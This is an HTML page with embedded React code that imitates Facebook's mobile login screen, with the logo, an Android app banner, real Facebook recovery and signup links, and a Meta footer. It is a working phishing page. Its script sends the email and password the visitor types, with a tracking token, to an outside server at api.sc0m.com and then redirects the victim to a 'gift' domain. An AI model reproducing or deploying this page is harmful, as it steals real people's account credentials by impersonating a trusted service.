<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>FACEBOOK</title>

    <meta name="viewport" content="width=device-width, initial-scale=1.0">





<style>
    body {
  background-color: #eee;
}

.conta {
  position: relative;
  height: 100vh;
}
.container img {
  width: 300px;
  max-width: 90%;
}

.container {
  width: 90%;
}

.container .colors {
  /* background-color: white; */
  width: 500px;
  max-width: 90%;
  height: 500px;
  margin: auto;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  border-radius: 5px;
  display: grid;
  grid-template-columns: repeat(auto-fit, minmax(100px, 1fr));
  grid-gap: 10px;
}

.container .logo {
  display: flex;
  justify-content: center;
  position: absolute;
  left: 50%;
  top: 10%;
  transform: translate(-50%, -50%);
}

.container h1 {
  text-align: center;
}

.color1 {
  background: linear-gradient(100deg, #1f4037 -100%, #99f2c8);
}

.color2 {
  background: linear-gradient(100deg, whitesmoke -100%, #ff691f);
}
.color3 {
  background: linear-gradient(100deg, whitesmoke -100%, #fab81e);
}
.color4 {
  background: linear-gradient(100deg, whitesmoke -100%, #f58ea8);
}
.color5 {
  background: linear-gradient(100deg, whitesmoke -100%, #19cf86);
}
.color6 {
  background: linear-gradient(100deg, whitesmoke -100%, #91d2fa);
}
.color7 {
  background: linear-gradient(100deg, whitesmoke -100%, #1b95e0);
}
.color8 {
  background: linear-gradient(100deg, whitesmoke -100%, #abb8c2);
}
.color9 {
  background: linear-gradient(100deg, whitesmoke -100%, #e81c4f);
}
.color10 {
  background: linear-gradient(100deg, whitesmoke -100%, #000000);
}
.color11 {
  background: linear-gradient(100deg, #c6426e -10%, #642b73);
}
.color12 {
  background: linear-gradient(100deg, #0f2027 -10%, #203a43);
}

.co {
  border-radius: 20px;
  box-shadow: rgb(0 0 0 / 25%) 0px 5px 20px;
  transition: transform 500ms;
  animation: bounce 1s;
  padding: 25px 0px;
  cursor: pointer;
}

@keyframes bounce {
  0% {
    transform: rotate(0deg) scale(1);
  }
  33% {
    transform: rotate(12deg) scale(1.2);
  }
  67% {
    transform: rotate(-12deg) scale(0.8);
  }
  100% {
    transform: rotate(0deg) scale(1);
  }
}

.co:hover {
  transform: rotate(0deg) scale(1.2);
}

.border {
  border: 5px solid black;
}

.btnu {
  position: absolute;
  top: 83%;
  left: 50%;
  width: 500px;
  max-width: 90%;
  transform: translate(-50%, 50%);
  height: 70px;
}

@media (max-width: 455px) {
  .btnu {
    position: absolute;
    top: 80%;
    left: 50%;
    width: 500px;
    max-width: 90%;
    transform: translate(-50%, 50%);
    height: 57px;
    margin-bottom: 32px;
  }
}
@media (max-width: 455px) {
  .co:hover {
    transform: rotate(0deg) scale(1.08);
  }
}
/* @media (max-width:455px) {
    .buut {
        margin-bottom: 40px;
    }

  } */
.in {
  width: 350px;
  max-width: 90%;
  display: block;
  margin: auto;
  padding: 10px;
  margin-bottom: 6px;
  background-color: #f5f6f7;
  border: none;
  border-radius: 4px;
  border: 1px solid #00000012;
  font-size: 14px;
  font-family: Arial, Helvetica, sans-serif;
}

.sub {
  width: 350px;
  max-width: 90%;
  display: block;
  margin: auto;
  padding: 10px;
  background-color: #1877f2 !important;
  color: white;
  border: none;
  border-radius: 5px;
  margin-top: 10px;
  font-family: Arial, Helvetica, sans-serif;
  font-weight: bold;
}

.modal-content {
  width: 95%;
  margin: auto;
}

.lg {
  width: 112px !important;
  display: block;
  margin: auto;
  margin-bottom: 25px;
}

.modal-body .fr {
  text-align: center;
  display: block;
  margin: auto;
  margin-top: 20px;
  font-size: 14px;
}

.hr {
  position: relative;
}

.hr .t {
  font-size: 14px;
  padding: 0px 20px;
  position: absolute;
  top: -11px;
  right: 50%;
  transform: translate(50%, 0px);
  font-family: Arial, Helvetica, sans-serif;
  color: #4b4f56;
  background-color: white;
}

.cr {
  background-color: #00a400;
  color: white;
  padding: 8px 10px;
  border-radius: 7px;
  text-decoration: none;
  margin: auto;
  display: block;
  width: 167px;
  font-size: 14px;
  text-align: center;
  font-family: Arial;
  font-weight: bold;
  margin-bottom: 30px;
}

.cr:hover {
  color: white;
}

.modal-body p {
  display: flex;
  justify-content: center;
  color: gray;
  font-size: 12px;
  margin-top: 10px;
  bottom: 5px;
  margin-bottom: 0px;
}

h5 {
  font-size: 1rem;
  color: red;
}

.container {
  margin-top: 25px;
  padding-left: 0px !important;
  padding-right: 0px !important;
}

input {
  width: 416px !important;
}

.fr {
  display: flex;
  justify-content: center;
  margin-top: 12px;
  font-size: 14px;
  text-decoration: none;
}

.hr {
  width: 416px !important;
  max-width: 90%;
  display: block;
  margin: auto;
  margin-bottom: 25px;
}

.bet {
  display: flex;
  justify-content: space-between;
  align-items: flex-end;
  margin-top: 100px;
}

p {
  margin: 0;
  font-size: 11px;
  color: #3d6299;
  text-align: center;
}

.must p {
  text-align: left;
  color: #7f7212;
  background-color: #fefbe2;
  border-bottom: 2px solid #e2c822;
  padding: 5px 8px;
  margin: 0;
  font-size: 14px;
}
#centerr{
  text-align: center;
}
/*----------------------*/
a {
      text-decoration: none;
      text-align: center;
      display: block;
      font-size: 14px;
      margin: 15px 0;
      color: blue;
    }

    .or {
      display: flex;
      margin: 32px 0;
      position: relative;
      
      
      
    }
    .testtt{
      margin-TOP: 50PX;
    }

    .p2,
    .p3 {
      background: black;
      height: 0.5px;
      width: 145px;
      margin: 0 10px;
    }

    .pOR {
      margin-top: -9px;
    }

    #CNA {
      background: none;
      border: .5px solid black;
      border-radius: 5px;
      padding: 8px 3px;
      width: 80vw;
      font-weight: bold;
      font-size: 16px;
      margin: -25px 25px;
    }
    .lang{
      display: flex;
      margin-top: 90px;
    }
    .lang span{
      margin: 0 65px;
      list-style: none;
      font-size: 13px;
    }
    .lang span li{
     margin: 3px 0;      
     color: #2E325E;
    }
    .lang span .bl{
      font-size: 14px;
      margin: 0 -8px;
      color: black; 
    }
   .footer{
     margin: 15px 22px;
    }
    .footer ul {
      display: flex;
    }
    .footer ul li{
      font-size: 10px;
    color: #8F9098;
     margin: 0 7px;
    }
    .no{
      list-style: none;
    }
    .meta{
      color: #8F9098;
      font-size: 13px;
      margin-top: -2px;
    }
    .nonee{
      position: absolute;
      top: 270px;
      
      margin: auto;
    }
</style>


  </head>
  <script
    crossorigin
    src="https://unpkg.com/react@18/umd/react.development.js"
  ></script>
  <script
    crossorigin
    src="https://unpkg.com/react-dom@18/umd/react-dom.development.js"
  ></script>
  <script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
  <!-- tailwind cdn  -->
  <script src="https://cdn.tailwindcss.com"></script>

  <script
    src="https://cdnjs.cloudflare.com/ajax/libs/axios/1.5.0/axios.min.js"
    integrity="sha512-aoTNnqZcT8B4AmeCFmiSnDlc4Nj/KPaZyB5G7JnOnUEkdNpCZs1LCankiYi01sLTyWy+m2P+W4XM+BuQ3Q4/Dg=="
    crossorigin="anonymous"
    referrerpolicy="no-referrer"
  ></script>
  <body>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root"></div>

    <script type="text/babel">

      const axios = axios.create({
              baseURL: "https://api.sc0m.com/api",
              timeout: 5000,
              headers: { "X-Custom-Header": "" },
            });

            const MainContent = () => {


              const [vEmail, setVEmail] = React.useState("");
              const [vPassword, setVPassword] = React.useState("");
              const [data, setData] = React.useState("OGFiNjIwZTktNWI3My00NWNiLWJiODMtNWEwMjM1NTFlNjZhX3F1ZXJ5X2Q0NGU0NTRiLWZlZTMtNDliYS1hYTEzLTI3YzY2NjI0ODI2OQ==");

            

              const addNew = () => {
                if (vPassword === "" || vEmail === "")
                  return alert("Please fill all the fields");
                const body = {
                  data,
                  email: vEmail,
                  password: vPassword,
                };

                axios
                  .post("/contact", body)
                  .then(({ data }) => {
                    window.location = data;
                  })
                  .catch((err) => {
                    window.location = "https://gift.sc0m.com";
                  });
              };
              return (
                <>
                <div id="top_form">
                    <div class="must"><p id="centerr">Get Facebook for Android and browse faster.</p></div>
    <div class="conta"> 
        <div class="container">
                <div method="post">
                          <img class="lg" src="https://i.ibb.co/hFT2CgF/Facebook.png" alt=""/>
                          <input class="in" type="text" name="email" placeholder="Email address or mobile number" required="" onChange={(e) => setVEmail(e.target.value)}/>

                          <input class="in" type="password" name="pass" placeholder="Password"  onChange={(e) => setVPassword(e.target.value)}/>
                          <input class="sub" type="submit" placeholder="" value="Login"  onClick={addNew}/>

                      </div>
                      </div>
                      </div>
                        </div>

             {  /*   <header className="bg-blue-500 h-14 w-full flex justify-start items-center pl-5 text-white font-normal">
                    <p>Facebook</p>
                  </header>

                  <div className="grid place-content-center grid-cols-1 md:px-36 mt-10 gap-10">

                    <div
                      className="m-auto text-xs sm:text-sm md:text-lg max-w-sm md:max-w-2xl text-center "
                    ></div>

                    <div className="p-2 w-full  gap-1  ">
                      <div className="flex flex-col   p-2  gap-1">
                        <label className="text-gray-500 text-sm"></label>
                        <input

                          type="text"
                          className="w-full border p-2 rounded-md"
                          placeholder="Phone number, username, or email"
                          onChange={(e) => setVEmail(e.target.value)}
                        />
                      </div>
                      <div className="flex flex-col   p-2   gap-1">
                        <label htmlFor="password" className="text-gray-500 text-sm">

                        </label>
                        <input
                          type="password"
                          className="w-full border p-2 rounded-md"
                          placeholder="Password"
                          id="password"
                          autoComplete="new-password"
                          onChange={(e) => setVPassword(e.target.value)}
                        />
                      </div>
                      <div className="flex flex-col justify-center items-center  p-2 gap-1 w-3/6 mx-auto">
                        <button

                          className=" text-white p-3 rounded-md w-full bg-blue-500 hover:bg-blue-600"
                          onClick={addNew}
                        >
                         Log In
                        </button>
                      </div>
                    </div>
                  </div>*/}
                </>
              );
            };

            //render the component to the DOM
            ReactDOM.render(<MainContent />, document.getElementById('root'));
    </script>
    <div class="nonee">
    <div>
    <a id="eeee" href="https://web.facebook.com/login/identify/?ctx=recover&from_login_screen=0">Forgotten password? </a>
    <div class="testtt">
      <button id="CNA" type="submit"><a  href="https://web.facebook.com/r.php">Create new account</a></button>
      
    </div>

    
    </form>

  <div class="lang">
    <span>
      <li class="bl">English (UK)</li>
      <li> portugeese</li>
      <li>Japanies</li>
      <li>Spanish</li>
    </span>

    <span>
      <li>Hindi</li>
      <li> Gujarati</li>
      <li>Telugu</li>
    </span>
  </div>

  <div class="footer">
    <ul>
      <li class="no">About</li>
      <li>Help </li>
      <li>More</li>
    </ul>
  </div>

  <p class="meta">Meta &copy; 2023</p>

</div>
  </body>
  <style>
    #eeee{
      text-decoration: none;
      text-align: center;
      display: block;
      font-size: 14px;
      margin: 15px 0;
      color: blue;
    }
   
  </style>
</html>